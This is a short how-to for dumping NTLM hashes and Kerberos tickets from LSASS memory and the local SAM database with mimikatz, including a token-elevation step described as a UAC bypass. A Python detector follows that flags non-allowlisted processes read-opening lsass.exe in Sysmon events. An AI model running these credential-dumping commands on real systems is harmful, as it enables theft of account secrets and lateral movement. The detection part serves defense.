Dump NTLM Hashes from Memory

This requires administrator rights or the SeDebug privilege.

We use mimikatz to extract the NTLM hashes / tickets from LSASS memory.

Start mimikatz:

.\mimikatz.exe

Then enable the SeDebug privilege:

privilege::debug

(DON'T USE UNLESS NEEDED: this is optional and used mostly to bypass UAC)

token::elevate

Then we extract the NTLM hashes with either of these commands:

TO TARGET LSASS MEMORY (DOMAIN USERS)

sekurlsa::logonpasswords

Alternatively, we can extract the TGS/TGT tickets:

sekurlsa::tickets

TO TARGET SAM LOCAL DB (LOCAL USERS)

lsadump::sam
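
From the defender's side, the commands above that read LSASS memory (the sekurlsa ones) appear as process-access events against lsass.exe. The following is an added example, not part of the original page: it scans Sysmon Event ID 10 (ProcessAccess) records for a non-allowlisted process opening lsass.exe with memory-read rights. It assumes Sysmon is configured to log ProcessAccess and that events arrive as flattened JSON lines; the allowlist and the sample events are constructed for illustration.

```python
import json

# Access-right bit from the Windows process security model.
PROCESS_VM_READ = 0x0010  # required to read another process's memory

# Hypothetical allowlist: images expected to read LSASS in this environment.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\program files\example-edr\agent.exe",
}

# Constructed sample events (flattened Sysmon Event ID 10 fields, one JSON object per line).
SAMPLE_EVENTS = r"""
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1fffff"}
{"EventID": 10, "SourceImage": "C:\\Users\\alice\\Downloads\\tool.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 10, "SourceImage": "C:\\Users\\alice\\Downloads\\tool.exe", "TargetImage": "C:\\Windows\\System32\\notepad.exe", "GrantedAccess": "0x1010"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe"}
"""

def find_lsass_readers(lines, allowed=ALLOWED_SOURCES):
    """Return ProcessAccess events where a non-allowlisted image read-opened LSASS."""
    hits = []
    for line in lines.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records instead of aborting the scan
        if not isinstance(ev, dict) or ev.get("EventID") != 10:
            continue
        source = str(ev.get("SourceImage", "")).lower()
        target = str(ev.get("TargetImage", "")).lower()
        if not target.endswith("\\lsass.exe"):
            continue
        try:
            access = int(ev.get("GrantedAccess", "0"), 16)
        except (TypeError, ValueError):
            continue
        # Flag only handles that can actually read LSASS memory.
        if access & PROCESS_VM_READ and source not in allowed:
            hits.append(ev)
    return hits

if __name__ == "__main__":
    for ev in find_lsass_readers(SAMPLE_EVENTS):
        print("ALERT: LSASS read access by", ev["SourceImage"], ev["GrantedAccess"])
```

The lsadump::sam command targets the local SAM database rather than LSASS memory, so this check does not cover it.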
